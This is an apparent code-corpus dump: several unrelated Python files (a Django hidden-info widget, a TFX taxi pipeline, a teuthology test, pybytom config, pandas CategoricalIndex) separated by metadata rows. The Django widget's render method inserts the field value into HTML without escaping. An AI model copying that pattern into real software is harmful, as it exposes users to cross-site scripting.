from django.utils.safestring import mark_safe
logger = logging.getLogger(__name__)
class InfoField(forms.CharField):
def __init__(self, *args, **kwargs):
if 'widget' not in kwargs:
kwargs['widget'] = InfoInput(
text=kwargs.pop('text', ""),
)
super(InfoField, self).__init__(*args, **kwargs)
class InfoInput(forms.widgets.HiddenInput):
def __init__(self, *args, **kwargs):
self.text = kwargs.pop('text', "")
super(InfoInput, self).__init__(*args, **kwargs)
def render(self, name, value, attrs={}):
if 'id' not in attrs:
attrs['id'] = "id_%s" % name
return '''<div id="%(id)s" >%(value)s</div>
''' % {
'id' : attrs['id'],
'value': value,
'text': self.text,
}
| 26.577778
| 56
| 0.600334
|
2493337ebc51aabe861c2cb13697be06ff98df3a
| 9,846
|
py
|
Python
|
tfx/examples/chicago_taxi_pipeline/taxi_pipeline_beam.py
|
RossKohler/tfx
|
ce2fd6fbde9845cd837c47089c3d6db2f87007b9
|
[
"Apache-2.0"
] | null | null | null |
tfx/examples/chicago_taxi_pipeline/taxi_pipeline_beam.py
|
RossKohler/tfx
|
ce2fd6fbde9845cd837c47089c3d6db2f87007b9
|
[
"Apache-2.0"
] | null | null | null |
tfx/examples/chicago_taxi_pipeline/taxi_pipeline_beam.py
|
RossKohler/tfx
|
ce2fd6fbde9845cd837c47089c3d6db2f87007b9
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Chicago taxi example using TFX."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import socket
import sys
from typing import List, Text
import absl
from absl.flags import argparse_flags
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import Pusher
from tfx.components import ResolverNode
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.components.trainer.executor import Executor
from tfx.dsl.components.base import executor_spec
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import metadata
from tfx.orchestration import pipeline
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
_pipeline_name = 'chicago_taxi_beam'
# This example assumes that the taxi data is stored in ~/taxi/data and the
# taxi utility function is in ~/taxi. Feel free to customize this as needed.
_taxi_root = os.path.join(os.environ['HOME'], 'taxi')
_data_root = os.path.join(_taxi_root, 'data', 'simple')
# Python module file to inject customized logic into the TFX components. The
# Transform and Trainer both require user-defined functions to run successfully.
_module_file = os.path.join(_taxi_root, 'taxi_utils.py')
# Path which can be listened to by the model server. Pusher will output the
# trained model here.
_serving_model_dir = os.path.join(_taxi_root, 'serving_model', _pipeline_name)
# Directory and data locations. This example assumes all of the chicago taxi
# example code and metadata library is relative to $HOME, but you can store
# these files anywhere on your local filesystem.
_tfx_root = os.path.join(os.environ['HOME'], 'tfx')
_pipeline_root = os.path.join(_tfx_root, 'pipelines', _pipeline_name)
# Sqlite ML-metadata db path.
_metadata_path = os.path.join(_tfx_root, 'metadata', _pipeline_name,
'metadata.db')
# LINT.IfChange
try:
_parallelism = multiprocessing.cpu_count()
except NotImplementedError:
_parallelism = 1
# LINT.ThenChange(setup/setup_beam_on_flink.sh)
# Common pipeline arguments used by both Flink and Spark runners.
_beam_portable_pipeline_args = [
# The runner will instruct the original Python process to start Beam Python
# workers.
'--environment_type=LOOPBACK',
# Start Beam Python workers as separate processes as opposed to threads.
'--experiments=use_loopback_process_worker=True',
'--sdk_worker_parallelism=%d' % _parallelism,
# Setting environment_cache_millis to practically infinity enables
# continual reuse of Beam SDK workers, improving performance.
'--environment_cache_millis=1000000',
# TODO(b/183057237): Obviate setting this.
'--experiments=pre_optimize=all',
]
# Pipeline arguments for Beam powered Components.
# Arguments differ according to runner.
_beam_pipeline_args_by_runner = {
'DirectRunner': [
'--direct_running_mode=multi_processing',
# 0 means auto-detect based on on the number of CPUs available
# during execution time.
'--direct_num_workers=0',
],
'SparkRunner': [
'--runner=SparkRunner',
'--spark_submit_uber_jar',
'--spark_rest_url=http://%s:6066' % socket.gethostname(),
] + _beam_portable_pipeline_args,
'FlinkRunner': [
'--runner=FlinkRunner',
# LINT.IfChange
'--flink_version=1.12',
# LINT.ThenChange(setup/setup_beam_on_flink.sh)
'--flink_submit_uber_jar',
'--flink_master=http://localhost:8081',
'--parallelism=%d' % _parallelism,
] + _beam_portable_pipeline_args
}
# TODO(b/137289334): rename this as simple after DAG visualization is done.
def _create_pipeline(pipeline_name: Text, pipeline_root: Text, data_root: Text,
module_file: Text, serving_model_dir: Text,
metadata_path: Text,
beam_pipeline_args: List[Text]) -> pipeline.Pipeline:
"""Implements the chicago taxi pipeline with TFX."""
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = CsvExampleGen(input_base=data_root)
# Computes statistics over data for visualization and example validation.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
# Generates schema based on statistics files.
schema_gen = SchemaGen(
statistics=statistics_gen.outputs['statistics'],
infer_feature_shape=False)
# Performs anomaly detection based on statistics and data schema.
example_validator = ExampleValidator(
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
# Performs transformations and feature engineering in training and serving.
transform = Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file=module_file)
# Uses user-provided Python function that implements a model using TF-Learn.
trainer = Trainer(
module_file=module_file,
custom_executor_spec=executor_spec.ExecutorClassSpec(Executor),
transformed_examples=transform.outputs['transformed_examples'],
schema=schema_gen.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000))
# Get the latest blessed model for model validation.
model_resolver = ResolverNode(
instance_name='latest_blessed_model_resolver',
resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing))
# Uses TFMA to compute a evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(signature_name='eval')],
slicing_specs=[
tfma.SlicingSpec(),
tfma.SlicingSpec(feature_keys=['trip_start_hour'])
],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
'accuracy':
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.6}),
# Change threshold will be ignored if there is no
# baseline model resolved from MLMD (first run).
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
eval_config=eval_config)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
schema_gen,
example_validator,
transform,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
metadata_connection_config=metadata.sqlite_metadata_connection_config(
metadata_path),
beam_pipeline_args=beam_pipeline_args)
# To run this pipeline from the python CLI:
# $python taxi_pipeline_beam.py
if __name__ == '__main__':
absl.logging.set_verbosity(absl.logging.INFO)
parser = argparse_flags.ArgumentParser()
parser.add_argument(
'--runner',
type=str,
default='DirectRunner',
choices=['DirectRunner', 'FlinkRunner', 'SparkRunner'],
help='The Beam runner to execute Beam-powered components. '
'For FlinkRunner or SparkRunner, first run setup/setup_beam_on_flink.sh '
'or setup/setup_beam_on_spark.sh, respectively.')
parsed_args, _ = parser.parse_known_args(sys.argv)
BeamDagRunner().run(
_create_pipeline(
pipeline_name=_pipeline_name,
pipeline_root=_pipeline_root,
data_root=_data_root,
module_file=_module_file,
serving_model_dir=_serving_model_dir,
metadata_path=_metadata_path,
beam_pipeline_args=_beam_pipeline_args_by_runner[parsed_args.runner]))
| 39.227092
| 80
| 0.719582
|
db88f8f5eef5e7b446bbdd942fb55061b6854e8a
| 466
|
py
|
Python
|
scripts/test/script.py
|
grapheo12/teuthology
|
f69547410d113fea9811e5a002cc7a4689cffdbb
|
[
"MIT"
] | null | null | null |
scripts/test/script.py
|
grapheo12/teuthology
|
f69547410d113fea9811e5a002cc7a4689cffdbb
|
[
"MIT"
] | null | null | null |
scripts/test/script.py
|
grapheo12/teuthology
|
f69547410d113fea9811e5a002cc7a4689cffdbb
|
[
"MIT"
] | null | null | null |
import subprocess
from pytest import raises
from six import ensure_str
class Script(object):
script_name = 'teuthology'
def test_help(self):
args = (self.script_name, '--help')
out = ensure_str(subprocess.check_output(args))
assert out.startswith('usage')
def test_invalid(self):
args = (self.script_name, '--invalid-option')
with raises(subprocess.CalledProcessError):
subprocess.check_call(args)
| 25.888889
| 55
| 0.67382
|
ffaf8ac9b1bfc643b2af209136c94f46987c706a
| 26
|
py
|
Python
|
python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleTuple_after.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleTuple_after.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleTuple_after.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
f'{"foo"} {42:d} {2.5:f}'
| 13
| 25
| 0.384615
|
02637f26123cec7f323a52af26eb92195fc0fe31
| 1,986
|
py
|
Python
|
pybytom/config.py
|
meherett/btmhdw
|
6929750edb7747a9937806272127c98db86e4c98
|
[
"MIT"
] | 3
|
2019-06-02T06:31:06.000Z
|
2019-06-16T20:46:38.000Z
|
pybytom/config.py
|
meherett/btmhdw
|
6929750edb7747a9937806272127c98db86e4c98
|
[
"MIT"
] | 3
|
2020-09-10T04:40:58.000Z
|
2021-06-25T15:38:35.000Z
|
pybytom/config.py
|
meherett/btmhdw
|
6929750edb7747a9937806272127c98db86e4c98
|
[
"MIT"
] | 1
|
2020-08-11T07:48:19.000Z
|
2020-08-11T07:48:19.000Z
|
#!/usr/bin/env python3
from .assets import BTM as ASSET
# Bytom mainchain & sidechain configuration
config: dict = {
"mainchain": {
"mainnet": {
"bytom-core": "http://localhost:9888",
"blockmeta": "https://blockmeta.com/api/v3",
"blockcenter": "https://bcapi.bystack.com/bytom/v3",
"mov": "https://ex.movapi.com/bytom/v3"
},
"solonet": {
"bytom-core": "http://localhost:9888",
"blockmeta": None,
"blockcenter": None,
"mov": None
},
"testnet": {
"bytom-core": "http://localhost:9888",
"blockmeta": None,
"blockcenter": None,
"mov": None
}
},
"sidechain": {
"mainnet": {
"vapor-core": "http://localhost:9889",
"blockmeta": "https://vapor.blockmeta.com/api/v1",
"blockcenter": "https://bcapi.bystack.com/vapor/v3",
"mov": "https://ex.movapi.com/vapor/v3"
},
"solonet": {
"vapor-core": "http://localhost:9889",
"blockmeta": None,
"blockcenter": None,
"mov": None
},
"testnet": {
"vapor-core": "http://localhost:9889",
"blockmeta": None,
"blockcenter": None,
"mov": None
}
},
"harden": 0x80000000,
"vapor": False,
"network": "mainnet",
"timeout": 60,
"asset": ASSET,
"symbols": {
"BTM": 1,
"mBTM": 1000,
"NEU": 100_000_000
},
"path": "m/44/153/1/0/1",
"BIP44": "m/44/153/{account}/{change}/{address}",
"indexes": ["2c000000", "99000000", "01000000", "00000000", "01000000"],
"fee": 10_000_000,
"confirmations": 1,
"forbid_chain_tx": False,
"headers": {
"User-Agent": "PyBytom User Agent v0.1.0",
"Content-Type": "application/json; charset=utf-8",
"Accept": "application/json"
}
}
| 28.371429
| 76
| 0.484894
|
a2f6fa32ca1a3f678b9591c6ba489729ebfbc30e
| 1,529
|
py
|
Python
|
src/blockmatching/__init__.py
|
duducosmos/blockmatching
|
c37949cce79b58ae658d5814ba3cff906dc4ab4e
|
[
"Apache-2.0"
] | 1
|
2021-05-17T09:20:05.000Z
|
2021-05-17T09:20:05.000Z
|
src/blockmatching/__init__.py
|
duducosmos/blockmatching
|
c37949cce79b58ae658d5814ba3cff906dc4ab4e
|
[
"Apache-2.0"
] | null | null | null |
src/blockmatching/__init__.py
|
duducosmos/blockmatching
|
c37949cce79b58ae658d5814ba3cff906dc4ab4e
|
[
"Apache-2.0"
] | 3
|
2020-11-25T04:06:16.000Z
|
2022-01-21T16:36:16.000Z
|
#!/usr/bin/env python3.6
# -*- Coding: UTF-8 -*-
"""
Block Matching Algorithm to estimate optical flux and detection of moving
objects.
According to [cuevs2013]_ in a block matching (BM) approach:
'''...image frames in a video sequence are divided into blocks. For each
block in the current frame, the best matching block is identified inside a
region of the previous frame, aiming to minimize the sum of absolute
differences...'''
License
-------
Developed by: E. S. Pereira.
e-mail: pereira.somoza@gmail.com
Copyright [2019] [E. S. Pereira]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
References
----------
.. [cuevs2013] CUEVAS, Erik et al. Block matching algorithm for motion
estimation based on Artificial Bee Colony (ABC).
Applied Soft Computing, v. 13, n. 6, p. 3047-3059, 2013.
"""
from .blockmatching import *
from .clustering import *
from .vectormask import *
from .background import *
from .motionlayers import *
from .dlayers import *
from .savevideo import *
from .forecast import *
| 30.58
| 78
| 0.730543
|
b5089621313b8bff9504de6e3c5dbb30a9b0954c
| 21,383
|
py
|
Python
|
pandas/core/indexes/category.py
|
gancho-ivanov/pandas
|
3cbbb96f0514f872bbf154f1ed418c7aa7300e9e
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/indexes/category.py
|
gancho-ivanov/pandas
|
3cbbb96f0514f872bbf154f1ed418c7aa7300e9e
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/indexes/category.py
|
gancho-ivanov/pandas
|
3cbbb96f0514f872bbf154f1ed418c7aa7300e9e
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
from __future__ import annotations
from typing import (
Any,
Hashable,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import index as libindex
from pandas._libs.lib import no_default
from pandas._typing import (
ArrayLike,
Dtype,
DtypeObj,
)
from pandas.util._decorators import (
Appender,
doc,
)
from pandas.core.dtypes.common import (
ensure_platform_int,
is_categorical_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
is_valid_na_for_dtype,
isna,
notna,
)
from pandas.core import accessor
from pandas.core.arrays.categorical import (
Categorical,
contains,
)
from pandas.core.construction import extract_array
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import (
Index,
_index_shared_docs,
maybe_extract_name,
)
from pandas.core.indexes.extension import (
NDArrayBackedExtensionIndex,
inherit_names,
)
_index_doc_kwargs: dict[str, str] = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update({"target_klass": "CategoricalIndex"})
@inherit_names(
[
"argsort",
"_internal_get_values",
"tolist",
"codes",
"categories",
"ordered",
"_reverse_indexer",
"searchsorted",
"is_dtype_equal",
"min",
"max",
],
Categorical,
)
@accessor.delegate_names(
delegate=Categorical,
accessors=[
"rename_categories",
"reorder_categories",
"add_categories",
"remove_categories",
"remove_unused_categories",
"set_categories",
"as_ordered",
"as_unordered",
],
typ="method",
overwrite=True,
)
class CategoricalIndex(NDArrayBackedExtensionIndex, accessor.PandasDelegate):
"""
Index based on an underlying :class:`Categorical`.
CategoricalIndex, like Categorical, can only take on a limited,
and usually fixed, number of possible values (`categories`). Also,
like Categorical, it might have an order, but numerical operations
(additions, divisions, ...) are not possible.
Parameters
----------
data : array-like (1-dimensional)
The values of the categorical. If `categories` are given, values not in
`categories` will be replaced with NaN.
categories : index-like, optional
The categories for the categorical. Items need to be unique.
If the categories are not given here (and also not in `dtype`), they
will be inferred from the `data`.
ordered : bool, optional
Whether or not this categorical is treated as an ordered
categorical. If not given here or in `dtype`, the resulting
categorical will be unordered.
dtype : CategoricalDtype or "category", optional
If :class:`CategoricalDtype`, cannot be used together with
`categories` or `ordered`.
copy : bool, default False
Make a copy of input ndarray.
name : object, optional
Name to be stored in the index.
Attributes
----------
codes
categories
ordered
Methods
-------
rename_categories
reorder_categories
add_categories
remove_categories
remove_unused_categories
set_categories
as_ordered
as_unordered
map
Raises
------
ValueError
If the categories do not validate.
TypeError
If an explicit ``ordered=True`` is given but no `categories` and the
`values` are not sortable.
See Also
--------
Index : The base pandas Index type.
Categorical : A categorical array.
CategoricalDtype : Type for categorical data.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/advanced.html#categoricalindex>`__
for more.
Examples
--------
>>> pd.CategoricalIndex(["a", "b", "c", "a", "b", "c"])
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['a', 'b', 'c'], ordered=False, dtype='category')
``CategoricalIndex`` can also be instantiated from a ``Categorical``:
>>> c = pd.Categorical(["a", "b", "c", "a", "b", "c"])
>>> pd.CategoricalIndex(c)
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['a', 'b', 'c'], ordered=False, dtype='category')
Ordered ``CategoricalIndex`` can have a min and max value.
>>> ci = pd.CategoricalIndex(
... ["a", "b", "c", "a", "b", "c"], ordered=True, categories=["c", "b", "a"]
... )
>>> ci
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['c', 'b', 'a'], ordered=True, dtype='category')
>>> ci.min()
'c'
"""
_typ = "categoricalindex"
_data_cls = Categorical
@property
def _can_hold_strings(self):
return self.categories._can_hold_strings
codes: np.ndarray
categories: Index
_data: Categorical
_values: Categorical
@property
def _engine_type(self):
# self.codes can have dtype int8, int16, int32 or int64, so we need
# to return the corresponding engine type (libindex.Int8Engine, etc.).
# error: Invalid index type "Type[generic]" for "Dict[Type[signedinteger[Any]],
# Any]"; expected type "Type[signedinteger[Any]]"
return {
np.int8: libindex.Int8Engine,
np.int16: libindex.Int16Engine,
np.int32: libindex.Int32Engine,
np.int64: libindex.Int64Engine,
}[
self.codes.dtype.type # type: ignore[index]
]
_attributes = ["name"]
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
data=None,
categories=None,
ordered=None,
dtype: Dtype | None = None,
copy: bool = False,
name: Hashable = None,
) -> CategoricalIndex:
name = maybe_extract_name(name, data, cls)
if is_scalar(data):
raise cls._scalar_data_error(data)
data = Categorical(
data, categories=categories, ordered=ordered, dtype=dtype, copy=copy
)
return cls._simple_new(data, name=name)
# --------------------------------------------------------------------
@doc(Index._shallow_copy)
def _shallow_copy(
self,
values: Categorical,
name: Hashable = no_default,
) -> CategoricalIndex:
name = self._name if name is no_default else name
if values is not None:
# In tests we only get here with Categorical objects that
# have matching .ordered, and values.categories a subset of
# our own. However we do _not_ have a dtype match in general.
values = Categorical(values, dtype=self.dtype)
return super()._shallow_copy(values=values, name=name)
def _is_dtype_compat(self, other) -> Categorical:
"""
*this is an internal non-public method*
provide a comparison between the dtype of self and other (coercing if
needed)
Parameters
----------
other : Index
Returns
-------
Categorical
Raises
------
TypeError if the dtypes are not compatible
"""
if is_categorical_dtype(other):
other = extract_array(other)
if not other._categories_match_up_to_permutation(self):
raise TypeError(
"categories must match existing categories when appending"
)
else:
values = other
cat = Categorical(other, dtype=self.dtype)
other = CategoricalIndex(cat)
if not other.isin(values).all():
raise TypeError(
"cannot append a non-category item to a CategoricalIndex"
)
other = other._values
if not ((other == values) | (isna(other) & isna(values))).all():
# GH#37667 see test_equals_non_category
raise TypeError(
"categories must match existing categories when appending"
)
return other
def equals(self, other: object) -> bool:
"""
Determine if two CategoricalIndex objects contain the same elements.
Returns
-------
bool
If two CategoricalIndex objects have equal elements True,
otherwise False.
"""
if self.is_(other):
return True
if not isinstance(other, Index):
return False
try:
other = self._is_dtype_compat(other)
except (TypeError, ValueError):
return False
return self._data.equals(other)
# --------------------------------------------------------------------
# Rendering Methods
@property
def _formatter_func(self):
return self.categories._formatter_func
def _format_attrs(self):
"""
Return a list of tuples of the (attr,formatted_value)
"""
max_categories = (
10
if get_option("display.max_categories") == 0
else get_option("display.max_categories")
)
attrs = [
(
"categories",
ibase.default_pprint(self.categories, max_seq_items=max_categories),
),
# error: "CategoricalIndex" has no attribute "ordered"
("ordered", self.ordered), # type: ignore[attr-defined]
]
if self.name is not None:
attrs.append(("name", ibase.default_pprint(self.name)))
attrs.append(("dtype", f"'{self.dtype.name}'"))
max_seq_items = get_option("display.max_seq_items") or len(self)
if len(self) > max_seq_items:
attrs.append(("length", len(self)))
return attrs
def _format_with_header(self, header: list[str], na_rep: str = "NaN") -> list[str]:
from pandas.io.formats.printing import pprint_thing
result = [
pprint_thing(x, escape_chars=("\t", "\r", "\n")) if notna(x) else na_rep
for x in self._values
]
return header + result
# --------------------------------------------------------------------
@property
def inferred_type(self) -> str:
return "categorical"
@doc(Index.__contains__)
def __contains__(self, key: Any) -> bool:
# if key is a NaN, check if any NaN is in self.
if is_valid_na_for_dtype(key, self.categories.dtype):
return self.hasnans
return contains(self, key, container=self._engine)
@doc(Index.fillna)
def fillna(self, value, downcast=None):
value = self._require_scalar(value)
try:
cat = self._data.fillna(value)
except (ValueError, TypeError):
# invalid fill_value
if not self.isna().any():
# nothing to fill, we can get away without casting
return self.copy()
return self.astype(object).fillna(value, downcast=downcast)
return type(self)._simple_new(cat, name=self.name)
@doc(Index.unique)
def unique(self, level=None):
if level is not None:
self._validate_index_level(level)
result = self._values.unique()
# Use _simple_new instead of _shallow_copy to ensure we keep dtype
# of result, not self.
return type(self)._simple_new(result, name=self.name)
def reindex(self, target, method=None, level=None, limit=None, tolerance=None):
"""
Create index with target's values (move/add/delete values as necessary)
Returns
-------
new_index : pd.Index
Resulting index
indexer : np.ndarray or None
Indices of output values in original index
"""
if method is not None:
raise NotImplementedError(
"argument method is not implemented for CategoricalIndex.reindex"
)
if level is not None:
raise NotImplementedError(
"argument level is not implemented for CategoricalIndex.reindex"
)
if limit is not None:
raise NotImplementedError(
"argument limit is not implemented for CategoricalIndex.reindex"
)
target = ibase.ensure_index(target)
if self.equals(target):
indexer = None
missing = np.array([], dtype=np.intp)
else:
indexer, missing = self.get_indexer_non_unique(np.array(target))
if len(self.codes) and indexer is not None:
new_target = self.take(indexer)
else:
new_target = target
# filling in missing if needed
if len(missing):
cats = self.categories.get_indexer(target)
if not isinstance(cats, CategoricalIndex) or (cats == -1).any():
# coerce to a regular index here!
result = Index(np.array(self), name=self.name)
new_target, indexer, _ = result._reindex_non_unique(np.array(target))
else:
codes = new_target.codes.copy()
codes[indexer == -1] = cats[missing]
cat = self._data._from_backing_data(codes)
new_target = type(self)._simple_new(cat, name=self.name)
# we always want to return an Index type here
# to be consistent with .reindex for other index types (e.g. they don't
# coerce based on the actual values, only on the dtype)
# unless we had an initial Categorical to begin with
# in which case we are going to conform to the passed Categorical
new_target = np.asarray(new_target)
if is_categorical_dtype(target):
new_target = Categorical(new_target, dtype=target.dtype)
new_target = type(self)._simple_new(new_target, name=self.name)
else:
new_target = Index(new_target, name=self.name)
return new_target, indexer
def _reindex_non_unique(self, target):
"""
reindex from a non-unique; which CategoricalIndex's are almost
always
"""
new_target, indexer = self.reindex(target)
new_indexer = None
check = indexer == -1
if check.any():
new_indexer = np.arange(len(self.take(indexer)))
new_indexer[check] = -1
cats = self.categories.get_indexer(target)
if not (cats == -1).any():
# .reindex returns normal Index. Revert to CategoricalIndex if
# all targets are included in my categories
new_target = Categorical(new_target, dtype=self.dtype)
new_target = type(self)._simple_new(new_target, name=self.name)
return new_target, indexer, new_indexer
# --------------------------------------------------------------------
# Indexing Methods
def _maybe_cast_indexer(self, key) -> int:
return self._data._unbox_scalar(key)
def _get_indexer(
self,
target: Index,
method: str | None = None,
limit: int | None = None,
tolerance=None,
) -> np.ndarray:
if self.equals(target):
return np.arange(len(self), dtype="intp")
return self._get_indexer_non_unique(target._values)[0]
@Appender(_index_shared_docs["get_indexer_non_unique"] % _index_doc_kwargs)
def get_indexer_non_unique(self, target):
target = ibase.ensure_index(target)
return self._get_indexer_non_unique(target._values)
def _get_indexer_non_unique(self, values: ArrayLike):
"""
get_indexer_non_unique but after unrapping the target Index object.
"""
# Note: we use engine.get_indexer_non_unique for get_indexer in addition
# to get_indexer_non_unique because, even if `target` is unique, any
# non-category entries in it will be encoded as -1 so `codes` may
# not be unique.
if isinstance(values, Categorical):
# Indexing on codes is more efficient if categories are the same,
# so we can apply some optimizations based on the degree of
# dtype-matching.
cat = self._data._encode_with_my_categories(values)
codes = cat._codes
else:
codes = self.categories.get_indexer(values)
indexer, missing = self._engine.get_indexer_non_unique(codes)
return ensure_platform_int(indexer), missing
@doc(Index._convert_list_indexer)
def _convert_list_indexer(self, keyarr):
# Return our indexer or raise if all of the values are not included in
# the categories
if self.categories._defer_to_indexing:
# See tests.indexing.interval.test_interval:test_loc_getitem_frame
indexer = self.categories._convert_list_indexer(keyarr)
return Index(self.codes).get_indexer_for(indexer)
return self.get_indexer_for(keyarr)
# --------------------------------------------------------------------
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
return self.categories._is_comparable_dtype(dtype)
def take_nd(self, *args, **kwargs):
"""Alias for `take`"""
warnings.warn(
"CategoricalIndex.take_nd is deprecated, use CategoricalIndex.take instead",
FutureWarning,
stacklevel=2,
)
return self.take(*args, **kwargs)
def map(self, mapper):
"""
Map values using input correspondence (a dict, Series, or function).
Maps the values (their categories, not the codes) of the index to new
categories. If the mapping correspondence is one-to-one the result is a
:class:`~pandas.CategoricalIndex` which has the same order property as
the original, otherwise an :class:`~pandas.Index` is returned.
If a `dict` or :class:`~pandas.Series` is used any unmapped category is
mapped to `NaN`. Note that if this happens an :class:`~pandas.Index`
will be returned.
Parameters
----------
mapper : function, dict, or Series
Mapping correspondence.
Returns
-------
pandas.CategoricalIndex or pandas.Index
Mapped index.
See Also
--------
Index.map : Apply a mapping correspondence on an
:class:`~pandas.Index`.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Series.apply : Apply more complex functions on a
:class:`~pandas.Series`.
Examples
--------
>>> idx = pd.CategoricalIndex(['a', 'b', 'c'])
>>> idx
CategoricalIndex(['a', 'b', 'c'], categories=['a', 'b', 'c'],
ordered=False, dtype='category')
>>> idx.map(lambda x: x.upper())
CategoricalIndex(['A', 'B', 'C'], categories=['A', 'B', 'C'],
ordered=False, dtype='category')
>>> idx.map({'a': 'first', 'b': 'second', 'c': 'third'})
CategoricalIndex(['first', 'second', 'third'], categories=['first',
'second', 'third'], ordered=False, dtype='category')
If the mapping is one-to-one the ordering of the categories is
preserved:
>>> idx = pd.CategoricalIndex(['a', 'b', 'c'], ordered=True)
>>> idx
CategoricalIndex(['a', 'b', 'c'], categories=['a', 'b', 'c'],
ordered=True, dtype='category')
>>> idx.map({'a': 3, 'b': 2, 'c': 1})
CategoricalIndex([3, 2, 1], categories=[3, 2, 1], ordered=True,
dtype='category')
If the mapping is not one-to-one an :class:`~pandas.Index` is returned:
>>> idx.map({'a': 'first', 'b': 'second', 'c': 'first'})
Index(['first', 'second', 'first'], dtype='object')
If a `dict` is used, all unmapped categories are mapped to `NaN` and
the result is an :class:`~pandas.Index`:
>>> idx.map({'a': 'first', 'b': 'second'})
Index(['first', 'second', nan], dtype='object')
"""
mapped = self._values.map(mapper)
return Index(mapped, name=self.name)
def _concat(self, to_concat: list[Index], name: Hashable) -> Index:
# if calling index is category, don't check dtype of others
try:
codes = np.concatenate([self._is_dtype_compat(c).codes for c in to_concat])
except TypeError:
# not all to_concat elements are among our categories (or NA)
from pandas.core.dtypes.concat import concat_compat
res = concat_compat(to_concat)
return Index(res, name=name)
else:
cat = self._data._from_backing_data(codes)
return type(self)._simple_new(cat, name=name)
def _delegate_method(self, name: str, *args, **kwargs):
""" method delegation to the ._values """
method = getattr(self._values, name)
if "inplace" in kwargs:
raise ValueError("cannot use inplace with CategoricalIndex")
res = method(*args, **kwargs)
if is_scalar(res):
return res
return CategoricalIndex(res, name=self.name)
| 32.84639
| 95
| 0.583454
|
